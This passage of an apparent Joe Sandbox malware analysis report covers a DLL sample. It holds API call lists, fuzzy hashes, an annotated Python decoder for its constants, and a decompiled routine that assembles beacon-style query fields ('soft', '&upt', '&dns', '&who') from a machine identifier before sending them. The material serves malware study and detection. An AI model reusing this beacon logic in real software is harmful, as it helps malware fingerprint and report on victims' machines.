                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                • Instruction ID: cb82c8ee1d6b302dd5c7aa37f094c5536560be14d97e42bc194a739499c87406
                • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                • Instruction Fuzzy Hash: 0621C433944605EBDB15DFA8C8808A7BBA5FF46350B498168DD158B249D730FA15DBE0
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000001.00000002.510921716.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_dc0000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 87a430a5e2ed3f1c4227b6f2eab8a72a1faaa1b3064adc0a261c4f03a8a5c6c4
                • Instruction ID: af26f34667b983181fd9b339372720595a96fabbd40289dab1678e417acc77e8
                • Opcode Fuzzy Hash: 87a430a5e2ed3f1c4227b6f2eab8a72a1faaa1b3064adc0a261c4f03a8a5c6c4
                • Instruction Fuzzy Hash: 5021263690021ACFDF20DF44CA84F99BBB5FB48324F199198D9092B216D330EE81CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000001.00000002.510921716.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_dc0000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c0f34f6acb7bce5793611b932e261abc6b4270e5bcbf4cf2c7ff734647af2108
                • Instruction ID: 2bfa34912411667cebeb346a1c925265a55bc2748ab3864cfa4ce5de5514918b
                • Opcode Fuzzy Hash: c0f34f6acb7bce5793611b932e261abc6b4270e5bcbf4cf2c7ff734647af2108
                • Instruction Fuzzy Hash: 38E0ED74D0016DCBCF20DA108D4AB9AB7F2AB8831DF1580D8D41D773009631EE95DE91
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000001.00000002.510921716.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_dc0000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0153c8c290b0c966c7fb07b79d60f400bef266160387ebf2174ebbd99c649857
                • Instruction ID: ba52377e2958942e0198c3d75caeba0ab619681680d0eb0edd716601a0cbb3df
                • Opcode Fuzzy Hash: 0153c8c290b0c966c7fb07b79d60f400bef266160387ebf2174ebbd99c649857
                • Instruction Fuzzy Hash: 8DE0B6B6901118EEFF168A45CD44FFAB7BDEBC8700F1480E2E609AA050C6315E808F24
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046DE555: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 046DE589
                  • Part of subcall function 046DE555: GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 046DE64A
                  • Part of subcall function 046DE555: ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 046DE653
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?), ref: 046C1204
                  • Part of subcall function 046D5FA2: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 046D5FBC
                  • Part of subcall function 046D5FA2: CreateWaitableTimerA.KERNEL32(046EE268,00000003,?), ref: 046D5FD9
                  • Part of subcall function 046D5FA2: GetLastError.KERNEL32(?,?,046DE5BD,?,?,?,00000000,?,?,?), ref: 046D5FEA
                  • Part of subcall function 046D5FA2: GetSystemTimeAsFileTime.KERNEL32(?,00000000,046DE5BD,?,?,?,046DE5BD,?), ref: 046D602A
                  • Part of subcall function 046D5FA2: SetWaitableTimer.KERNEL32(00000000,046DE5BD,00000000,00000000,00000000,00000000,?,?,046DE5BD,?), ref: 046D6049
                  • Part of subcall function 046D5FA2: HeapFree.KERNEL32(00000000,046DE5BD,00000000,046DE5BD,?,?,?,046DE5BD,?), ref: 046D605F
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?), ref: 046C1267
                • StrChrA.SHLWAPI(00000000,0000007C,00000040,00000000,00000000,00000000,00000000,00000000), ref: 046C12E2
                • StrTrimA.SHLWAPI(00000000,?), ref: 046C1304
                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 046C1344
                  • Part of subcall function 046CDFBD: RtlAllocateHeap.NTDLL(00000000,00000010,74E5F730), ref: 046CDFDF
                  • Part of subcall function 046CDFBD: HeapFree.KERNEL32(00000000,00000000,00000038,00000000,00000000,?,?,?,?,046C123D,?), ref: 046CE00D
                • WaitForMultipleObjects.KERNEL32(00008019,?,00000000,000000FF), ref: 046C13EA
                • CloseHandle.KERNEL32(?), ref: 046C1679
                  • Part of subcall function 046D2C22: WaitForSingleObject.KERNEL32(?,00000000,00000000,?,?,?,046C140C,?), ref: 046D2C2E
                  • Part of subcall function 046D2C22: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,046C140C,?), ref: 046D2C5C
                  • Part of subcall function 046D2C22: ResetEvent.KERNEL32(?,?,?,?,?,046C140C,?), ref: 046D2C76
                • WaitForSingleObject.KERNEL32(?,00000000,?), ref: 046C141F
                • WaitForSingleObject.KERNEL32(?,00000000), ref: 046C142E
                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 046C145B
                • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 046C1475
                • _allmul.NTDLL(0000003C,00000000,FF676980,000000FF), ref: 046C14BD
                • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,0000003C,00000000,FF676980,000000FF,00000000), ref: 046C14D7
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 046C14ED
                • ReleaseMutex.KERNEL32(?), ref: 046C150A
                • WaitForSingleObject.KERNEL32(?,00000000), ref: 046C151B
                • WaitForSingleObject.KERNEL32(?,00000000), ref: 046C152A
                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 046C155E
                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 046C1578
                • SwitchToThread.KERNEL32 ref: 046C157A
                • ReleaseMutex.KERNEL32(?), ref: 046C1584
                • WaitForSingleObject.KERNEL32(?,00000000), ref: 046C15C2
                • WaitForSingleObject.KERNEL32(?,00000000), ref: 046C15CD
                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 046C15F0
                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 046C160A
                • SwitchToThread.KERNEL32 ref: 046C160C
                • ReleaseMutex.KERNEL32(?), ref: 046C1616
                • WaitForSingleObject.KERNEL32(?,00000000), ref: 046C162B
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 046C168D
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 046C1699
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 046C16A5
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 046C16B1
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 046C16BD
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 046C16C9
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 046C16D5
                • RtlExitUserThread.NTDLL(00000000,?,?,?,?,?,?,?), ref: 046C16E4
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Wait$CloseHandleObjectSingle$TimerWaitable$MultipleObjects$HeapMutexRelease_allmul$FreeThread$CreateErrorEventLastSwitchTime$AllocateExitFileOpenResetSystemTrimUser
                • String ID:
                • API String ID: 2369282788-0
                • Opcode ID: 0b093f0d42afb706d07cfc53d46a7937a3faa2a9c8461d79c877bc67621e15bf
                • Instruction ID: 522ad55b8c6c57cbedcbacfa8f1fc2717554a57d0e9b530654a3f3cc8e7ff378
                • Opcode Fuzzy Hash: 0b093f0d42afb706d07cfc53d46a7937a3faa2a9c8461d79c877bc67621e15bf
                • Instruction Fuzzy Hash: 1AE1BEB1504305AFD710AF66CC809BABBE8FB85358F045A2EF595972A0F735EC418F62
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlAllocateHeap.NTDLL ref: 046D07A3
                • GetTickCount.KERNEL32 ref: 046D07BD
                • wsprintfA.USER32 ref: 046D0810
                • QueryPerformanceFrequency.KERNEL32(?), ref: 046D081C
                • QueryPerformanceCounter.KERNEL32(?), ref: 046D0827
                • _aulldiv.NTDLL(?,?,?,?), ref: 046D083D
                • wsprintfA.USER32 ref: 046D0853
                • wsprintfA.USER32 ref: 046D0878
                • HeapFree.KERNEL32(00000000,?), ref: 046D088B
                • wsprintfA.USER32 ref: 046D08AF
                • HeapFree.KERNEL32(00000000,?), ref: 046D08C2
                • wsprintfA.USER32 ref: 046D08FC
                • wsprintfA.USER32 ref: 046D0920
                • lstrcat.KERNEL32(?,?), ref: 046D0958
                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 046D0972
                • GetTickCount.KERNEL32 ref: 046D0982
                • RtlEnterCriticalSection.NTDLL(04C9C0A0), ref: 046D0996
                • RtlLeaveCriticalSection.NTDLL(04C9C0A0), ref: 046D09B4
                • StrTrimA.SHLWAPI(00000000,046E83F8,00000000,04C9C0E0), ref: 046D09ED
                • lstrcpy.KERNEL32(00000000,?), ref: 046D0A0F
                • lstrcpy.KERNEL32(00000000,00000000), ref: 046D0A16
                • lstrcat.KERNEL32(00000000,?), ref: 046D0A1D
                • lstrcat.KERNEL32(00000000,?), ref: 046D0A24
                • HeapFree.KERNEL32(00000000,?,00000000,?,046D7E99,?,?,00000000), ref: 046D0A9E
                • HeapFree.KERNEL32(00000000,?,00000000), ref: 046D0AB0
                • HeapFree.KERNEL32(00000000,00000000,00000000,04C9C0E0), ref: 046D0ABF
                • HeapFree.KERNEL32(00000000,00000000), ref: 046D0AD1
                • HeapFree.KERNEL32(00000000,?), ref: 046D0AE3
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Free$wsprintf$lstrcat$AllocateCountCriticalPerformanceQuerySectionTicklstrcpy$CounterEnterFrequencyLeaveTrim_aulldiv
                • String ID:
                • API String ID: 3373977504-0
                • Opcode ID: 8effdd34e043e0ca9bda86cbd098e88f21da857600f7f86d7d5de9730e2e4693
                • Instruction ID: 204d91b800c28d267a6a8bcb6344c77f147b81b69a3c9a74940bf5de7190c718
                • Opcode Fuzzy Hash: 8effdd34e043e0ca9bda86cbd098e88f21da857600f7f86d7d5de9730e2e4693
                • Instruction Fuzzy Hash: E2A16C71600206EFDB01EF66EC84E6A3BE8FB48304F045429F548DB261F73AE9599F65
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E01C14062(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, void* _a20) {
                				signed int _v8;
                				void* _v12;
                				void* _v16;
                				void* _v20;
                				void* _v24;
                				void* __ebx;
                				void* __edi;
                				long _t63;
                				intOrPtr _t64;
                				intOrPtr _t65;
                				intOrPtr _t66;
                				intOrPtr _t67;
                				intOrPtr _t68;
                				void* _t71;
                				intOrPtr _t72;
                				int _t75;
                				void* _t76;
                				void* _t77;
                				void* _t79;
                				void* _t82;
                				intOrPtr _t86;
                				intOrPtr _t90;
                				intOrPtr* _t92;
                				void* _t98;
                				intOrPtr _t104;
                				signed int _t108;
                				char** _t110;
                				int _t113;
                				intOrPtr* _t116;
                				intOrPtr* _t118;
                				intOrPtr* _t120;
                				intOrPtr* _t122;
                				intOrPtr _t125;
                				intOrPtr _t130;
                				int _t134;
                				intOrPtr _t136;
                				int _t139;
                				CHAR* _t140;
                				intOrPtr _t141;
                				void* _t142;
                				void* _t151;
                				int _t152;
                				void* _t153;
                				intOrPtr _t154;
                				void* _t156;
                				long _t160;
                				intOrPtr* _t161;
                				intOrPtr* _t162;
                				intOrPtr* _t165;
                				void* _t166;
                				void* _t168;
                
                				_t151 = __edx;
                				_t142 = __ecx;
                				_t63 = __eax;
                				_v8 = 8;
                				if(__eax == 0) {
                					_t63 = GetTickCount();
                				}
                				_t64 =  *0x1c1a01c; // 0x8e501c47
                				asm("bswap eax");
                				_t65 =  *0x1c1a018; // 0x3a87c8cd
                				_t140 = _a20;
                				asm("bswap eax");
                				_t66 =  *0x1c1a014; // 0xd8d2f808
                				asm("bswap eax");
                				_t67 =  *0x1c1a010; // 0xeec43f25
                				asm("bswap eax");
                				_t68 =  *0x1c1a2d8; // 0x55d5a8
                				_t3 = _t68 + 0x1c1b633; // 0x74666f73
                				_t152 = wsprintfA(_t140, _t3, 3, 0x3f880, _t67, _t66, _t65, _t64,  *0x1c1a030,  *0x1c1a008, _t63);
                				_t71 = E01C163D2();
                				_t72 =  *0x1c1a2d8; // 0x55d5a8
                				_t4 = _t72 + 0x1c1b673; // 0x74707526
                				_t75 = wsprintfA(_t152 + _t140, _t4, _t71);
                				_t168 = _t166 + 0x38;
                				_t153 = _t152 + _t75;
                				if(_a8 != 0) {
                					_t136 =  *0x1c1a2d8; // 0x55d5a8
                					_t8 = _t136 + 0x1c1b67e; // 0x732526
                					_t139 = wsprintfA(_t153 + _t140, _t8, _a8);
                					_t168 = _t168 + 0xc;
                					_t153 = _t153 + _t139;
                				}
                				_t76 = E01C14A14(_t142);
                				_t141 = __imp__; // 0x74e05520
                				_a8 = _t76;
                				if(_t76 != 0) {
                					_t130 =  *0x1c1a2d8; // 0x55d5a8
                					_t11 = _t130 + 0x1c1b8cc; // 0x736e6426
                					_t134 = wsprintfA(_a20 + _t153, _t11, _t76);
                					_t168 = _t168 + 0xc;
                					_t153 = _t153 + _t134;
                					HeapFree( *0x1c1a290, 0, _a8);
                				}
                				_t77 = E01C13C13();
                				_a8 = _t77;
                				if(_t77 != 0) {
                					_t125 =  *0x1c1a2d8; // 0x55d5a8
                					_t15 = _t125 + 0x1c1b8d4; // 0x6f687726
                					wsprintfA(_t153 + _a20, _t15, _t77);
                					_t168 = _t168 + 0xc;
                					HeapFree( *0x1c1a290, 0, _a8);
                				}
                				_t154 =  *0x1c1a384; // 0x21795b0
                				_t79 = E01C129DC(0x1c1a00e, _t154 + 4);
                				_t160 = 0;
                				_v16 = _t79;
                				if(_t79 == 0) {
                					L28:
                					HeapFree( *0x1c1a290, _t160, _a20);
                					return _v8;
                				} else {
                					_t82 = RtlAllocateHeap( *0x1c1a290, 0, 0x800);
                					_a8 = _t82;
                					if(_t82 == 0) {
                						L27:
                						HeapFree( *0x1c1a290, _t160, _v16);
                						goto L28;
                					}
                					E01C16341(GetTickCount());
                					_t86 =  *0x1c1a384; // 0x21795b0
                					__imp__(_t86 + 0x40);
                					asm("lock xadd [eax], ecx");
                					_t90 =  *0x1c1a384; // 0x21795b0
                					__imp__(_t90 + 0x40);
                					_t92 =  *0x1c1a384; // 0x21795b0
                					_t156 = E01C152C4(1, _t151, _a20,  *_t92);
                					_v24 = _t156;
                					asm("lock xadd [eax], ecx");
                					if(_t156 == 0) {
                						L26:
                						HeapFree( *0x1c1a290, _t160, _a8);
                						goto L27;
                					}
                					StrTrimA(_t156, 0x1c192a8);
                					_push(_t156);
                					_t98 = E01C15F46();
                					_v12 = _t98;
                					if(_t98 == 0) {
                						L25:
                						HeapFree( *0x1c1a290, _t160, _t156);
                						goto L26;
                					}
                					_t161 = __imp__;
                					 *_t161(_t156, _a4);
                					 *_t161(_a8, _v16);
                					_t162 = __imp__;
                					 *_t162(_a8, _v12);
                					_t104 = E01C123CC( *_t162(_a8, _t156), _a8);
                					_a4 = _t104;
                					if(_t104 == 0) {
                						_v8 = 8;
                						L23:
                						E01C151B1();
                						L24:
                						HeapFree( *0x1c1a290, 0, _v12);
                						_t160 = 0;
                						goto L25;
                					}
                					_t108 = E01C12309(_t141, 0xffffffffffffffff, _t156,  &_v20);
                					_v8 = _t108;
                					if(_t108 == 0) {
                						_t165 = _v20;
                						_v8 = E01C167CF(_t165, _a4, _a12, _a16);
                						_t116 =  *((intOrPtr*)(_t165 + 8));
                						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
                						_t118 =  *((intOrPtr*)(_t165 + 8));
                						 *((intOrPtr*)( *_t118 + 8))(_t118);
                						_t120 =  *((intOrPtr*)(_t165 + 4));
                						 *((intOrPtr*)( *_t120 + 8))(_t120);
                						_t122 =  *_t165;
                						 *((intOrPtr*)( *_t122 + 8))(_t122);
                						E01C12C11(_t165);
                					}
                					if(_v8 != 0x10d2) {
                						L18:
                						if(_v8 == 0) {
                							_t110 = _a12;
                							if(_t110 != 0) {
                								_t157 =  *_t110;
                								_t163 =  *_a16;
                								wcstombs( *_t110,  *_t110,  *_a16);
                								_t113 = E01C15C12(_t157, _t157, _t163 >> 1);
                								_t156 = _v24;
                								 *_a16 = _t113;
                							}
                						}
                						goto L21;
                					} else {
                						if(_a12 != 0) {
                							L21:
                							E01C12C11(_a4);
                							if(_v8 == 0 || _v8 == 0x10d2) {
                								goto L24;
                							} else {
                								goto L23;
                							}
                						}
                						_v8 = _v8 & 0x00000000;
                						goto L18;
                					}
                				}
                			}
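The listings above leave several constants in raw form: the E01C14062 code prints the first dword of each referenced string as a `// 0x....` comment (0x74666f73 and so on), loads four globals at 0x1c1a010..0x1c1a01c and byte-swaps them before handing them to wsprintfA, and the API list for the 046C0000 thread routine multiplies by FF676980 before every SetWaitableTimer. The Python below is an added analyst helper written for this page; it is not part of the Joe Sandbox report and not code recovered from the sample. Its input lines are copied from the listing above. It assumes a `%08x`-style conversion for the four swapped dwords (the page shows only the first four bytes of the format string, "soft") and that the `000000FF` high dword printed in the `_allmul` calls is really 0xFFFFFFFF.

```python
# Added analyst helper. Editor-written example code, not part of the Joe
# Sandbox report and not code recovered from the 61f113091fd0c.dll sample.
# It decodes three kinds of constant that the listings above leave raw.
import re
import struct

# Constructed input: the five string-reference lines copied verbatim from the
# decompiled E01C14062 listing. The decompiler prints the first dword of the
# referenced data as a `// 0x....` comment.
LISTING = """
_t3 = _t68 + 0x1c1b633; // 0x74666f73
_t4 = _t72 + 0x1c1b673; // 0x74707526
_t8 = _t136 + 0x1c1b67e; // 0x732526
_t11 = _t130 + 0x1c1b8cc; // 0x736e6426
_t15 = _t125 + 0x1c1b8d4; // 0x6f687726
"""

STRING_REF_RE = re.compile(r"\+\s*(0x[0-9a-f]+);\s*//\s*(0x[0-9a-f]+)", re.I)


def dword_to_ascii(value: int) -> str:
    """Read a 32-bit value as the four little-endian bytes it occupies in
    memory; for a string reference those are the string's first characters.
    Trailing NUL padding (0x732526 holds only three characters) is dropped."""
    return struct.pack("<I", value).rstrip(b"\x00").decode("ascii", errors="replace")


def recover_strings(listing: str) -> dict:
    """Map each string offset in the listing to the recovered prefix."""
    found = {}
    for offset, dword in STRING_REF_RE.findall(listing):
        text = dword_to_ascii(int(dword, 16))
        if text.isprintable():
            found[int(offset, 16)] = text
    return found


# --- the identifier built from the four globals at 0x1c1a010..0x1c1a01c ------

# Constructed from the `// 0x....` comments on those loads, in ascending
# address order, which is also the order in which they reach wsprintfA.
ID_DWORDS = [0xEEC43F25, 0xD8D2F808, 0x3A87C8CD, 0x8E501C47]


def bswap32(value: int) -> int:
    """The `asm("bswap eax")` the decompiler could not express."""
    return int.from_bytes(value.to_bytes(4, "little"), "big")


def user_id_hex(dwords=ID_DWORDS) -> str:
    """Byte-swap each dword and print it as eight hex digits. The "%08x"
    conversion is an assumption: the page shows only the first four bytes of
    the format string ("soft"). Under that assumption the result is simply a
    hex dump of the 16 bytes as they sit in memory (see memory_hex)."""
    return "".join("%08x" % bswap32(d) for d in dwords)


def memory_hex(dwords=ID_DWORDS) -> str:
    """Hex dump of the same 16 bytes in memory order, for comparison."""
    return struct.pack("<4I", *dwords).hex()


# --- the _allmul / SetWaitableTimer pairs in the API list --------------------

HUNDRED_NS_PER_SEC = 10_000_000


def allmul_due_time(seconds: int) -> int:
    """Reproduce _allmul(seconds, 0, 0xFF676980, 0xFFFFFFFF). The low dword
    0xFF676980 is -10,000,000 in two's complement; taking the high dword as
    0xFFFFFFFF (the report prints it truncated as 000000FF, so this is an
    assumption) the product is a negative 100-ns count, which is exactly
    the relative due time that SetWaitableTimer expects."""
    multiplier = struct.unpack("<q", struct.pack("<Q", 0xFFFFFFFFFF676980))[0]
    return seconds * multiplier


def due_time_seconds(due: int) -> float:
    """Turn a relative due time back into seconds of sleep."""
    return -due / HUNDRED_NS_PER_SEC


if __name__ == "__main__":
    for offset, text in recover_strings(LISTING).items():
        print("%#x -> %r" % (offset, text))
    print("user id:", user_id_hex(), "==", memory_hex())
    due = allmul_due_time(60)
    print("60 s as due time:", due, "->", due_time_seconds(due), "s")
```

Run stand-alone the script prints the five recovered prefixes ("soft", "&upt", "&%s", "&dns", "&who"), shows that the swapped-and-formatted identifier equals a plain hex dump of the 16 bytes, and shows the 0x3C operand in the API list is a 60-second relative timer. The recovered prefixes are only the first three or four bytes of each format string; the rest is not on the page.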
                0x01c14062
                0x01c14062
                0x01c14062
                0x01c1406d
                0x01c14074
                0x01c14076
                0x01c14076
                0x01c14083
                0x01c1408e
                0x01c14091
                0x01c14096
                0x01c1409f
                0x01c140a2
                0x01c140a7
                0x01c140aa
                0x01c140af
                0x01c140b2
                0x01c140be
                0x01c140cb
                0x01c140cd
                0x01c140d3
                0x01c140d8
                0x01c140e3
                0x01c140e5
                0x01c140e8
                0x01c140ee
                0x01c140f0
                0x01c140f8
                0x01c14103
                0x01c14105
                0x01c14108
                0x01c14108
                0x01c1410a
                0x01c14111
                0x01c14117
                0x01c1411a
                0x01c1411d
                0x01c14122
                0x01c1412f
                0x01c14131
                0x01c14137
                0x01c14141
                0x01c14141
                0x01c14143
                0x01c1414a
                0x01c1414d
                0x01c14150
                0x01c14155
                0x01c14162
                0x01c14164
                0x01c14172
                0x01c14172
                0x01c14174
                0x01c14182
                0x01c14187
                0x01c1418b
                0x01c1418e
                0x01c1434f
                0x01c14359
                0x01c14362
                0x01c14194
                0x01c141a0
                0x01c141a8
                0x01c141ab
                0x01c14343
                0x01c1434d
                0x00000000
                0x01c1434d
                0x01c141b7
                0x01c141bc
                0x01c141c5
                0x01c141d6
                0x01c141da
                0x01c141e3
                0x01c141e9
                0x01c141f8
                0x01c141ff
                0x01c14208
                0x01c1420e
                0x01c14337
                0x01c14341
                0x00000000
                0x01c14341
                0x01c1421a
                0x01c14220
                0x01c14221
                0x01c14228
                0x01c1422b
                0x01c1432d
                0x01c14335
                0x00000000
                0x01c14335
                0x01c14234
                0x01c1423b
                0x01c14243
                0x01c14248
                0x01c14251
                0x01c1425c
                0x01c14263
                0x01c14266
                0x01c14365
                0x01c14319
                0x01c14319
                0x01c1431e
                0x01c14329
                0x01c1432b
                0x00000000
                0x01c1432b
                0x01c14270
                0x01c14277
                0x01c1427a
                0x01c1427f
                0x01c1428f
                0x01c14292
                0x01c14298
                0x01c1429e
                0x01c142a4
                0x01c142a7
                0x01c142ad
                0x01c142b0
                0x01c142b5
                0x01c142b9
                0x01c142b9
                0x01c142c5
                0x01c142d1
                0x01c142d5
                0x01c142d7
                0x01c142dc
                0x01c142de
                0x01c142e3
                0x01c142e8
                0x01c142f5
                0x01c142fd
                0x01c14300
                0x01c14300
                0x01c142dc
                0x00000000
                0x01c142c7
                0x01c142cb
                0x01c14302
                0x01c14305
                0x01c1430e
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x01c1430e
                0x01c142cd
                0x00000000
                0x01c142cd
                0x01c142c5

                APIs
                • GetTickCount.KERNEL32 ref: 01C14076
                • wsprintfA.USER32 ref: 01C140C6
                • wsprintfA.USER32 ref: 01C140E3
                • wsprintfA.USER32 ref: 01C14103
                • wsprintfA.USER32 ref: 01C1412F
                • HeapFree.KERNEL32(00000000,00000000), ref: 01C14141
                • wsprintfA.USER32 ref: 01C14162
                • HeapFree.KERNEL32(00000000,00000000), ref: 01C14172
                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01C141A0
                • GetTickCount.KERNEL32 ref: 01C141B1
                • RtlEnterCriticalSection.NTDLL(02179570), ref: 01C141C5
                • RtlLeaveCriticalSection.NTDLL(02179570), ref: 01C141E3
                  • Part of subcall function 01C152C4: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7691C740,?,?,01C17675,?,021795B0), ref: 01C152EF
                  • Part of subcall function 01C152C4: lstrlen.KERNEL32(?,?,?,01C17675,?,021795B0), ref: 01C152F7
                  • Part of subcall function 01C152C4: strcpy.NTDLL ref: 01C1530E
                  • Part of subcall function 01C152C4: lstrcat.KERNEL32(00000000,?), ref: 01C15319
                  • Part of subcall function 01C152C4: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,01C17675,?,021795B0), ref: 01C15336
                • StrTrimA.SHLWAPI(00000000,01C192A8,?,021795B0), ref: 01C1421A
                  • Part of subcall function 01C15F46: lstrlen.KERNEL32(02179B10,00000000,00000000,7691C740,01C176A0,00000000), ref: 01C15F56
                  • Part of subcall function 01C15F46: lstrlen.KERNEL32(?), ref: 01C15F5E
                  • Part of subcall function 01C15F46: lstrcpy.KERNEL32(00000000,02179B10), ref: 01C15F72
                  • Part of subcall function 01C15F46: lstrcat.KERNEL32(00000000,?), ref: 01C15F7D
                • lstrcpy.KERNEL32(00000000,?), ref: 01C1423B
                • lstrcpy.KERNEL32(00000000,00000000), ref: 01C14243
                • lstrcat.KERNEL32(00000000,?), ref: 01C14251
                • lstrcat.KERNEL32(00000000,00000000), ref: 01C14257
                  • Part of subcall function 01C123CC: lstrlen.KERNEL32(?,00000000,02179B30,00000000,01C13413,02179D0E,69B25F44,?,?,?,?,69B25F44,00000005,01C1A010,4D283A53,?), ref: 01C123D3
                  • Part of subcall function 01C123CC: mbstowcs.NTDLL ref: 01C123FC
                  • Part of subcall function 01C123CC: memset.NTDLL ref: 01C1240E
                • wcstombs.NTDLL ref: 01C142E8
                  • Part of subcall function 01C167CF: SysAllocString.OLEAUT32(?), ref: 01C16810
                  • Part of subcall function 01C12C11: RtlFreeHeap.NTDLL(00000000,00000000,01C17013,00000000,?,?,00000000), ref: 01C12C1D
                • HeapFree.KERNEL32(00000000,?,00000000), ref: 01C14329
                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01C14335
                • HeapFree.KERNEL32(00000000,00000000,?,021795B0), ref: 01C14341
                • HeapFree.KERNEL32(00000000,00000000), ref: 01C1434D
                • HeapFree.KERNEL32(00000000,?), ref: 01C14359
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Free$lstrlenwsprintf$lstrcat$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                • String ID: Ut
                • API String ID: 2543559236-8415677
                • Opcode ID: 01ce31c37c41634b58c466f1acb6ae50b21f29f1499cc4b0c9679e7a07c96c83
                • Instruction ID: 983d62740713645a2d5545540bb2c0f0003c2d66d9d9c0b2efdbb92418256eaa
                • Opcode Fuzzy Hash: 01ce31c37c41634b58c466f1acb6ae50b21f29f1499cc4b0c9679e7a07c96c83
                • Instruction Fuzzy Hash: DD917B71981119EFDB21DFA8DC88B9A3BB9FF1A754F144024F90AD7224C735DA50EB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(?,?,046EE218), ref: 046D99AD
                • RtlAllocateHeap.NTDLL(00000000,046EE17D,?), ref: 046D9A49
                • lstrcpyn.KERNEL32(00000000,?,046EE17D,?,046EE218), ref: 046D9A5E
                • HeapFree.KERNEL32(00000000,00000000,00000000,?,046EE218), ref: 046D9A79
                • StrChrA.SHLWAPI(?,00000020,00000000,?,046EE17C,?,?,046EE218), ref: 046D9B60
                • StrChrA.SHLWAPI(00000001,00000020,?,046EE218), ref: 046D9B71
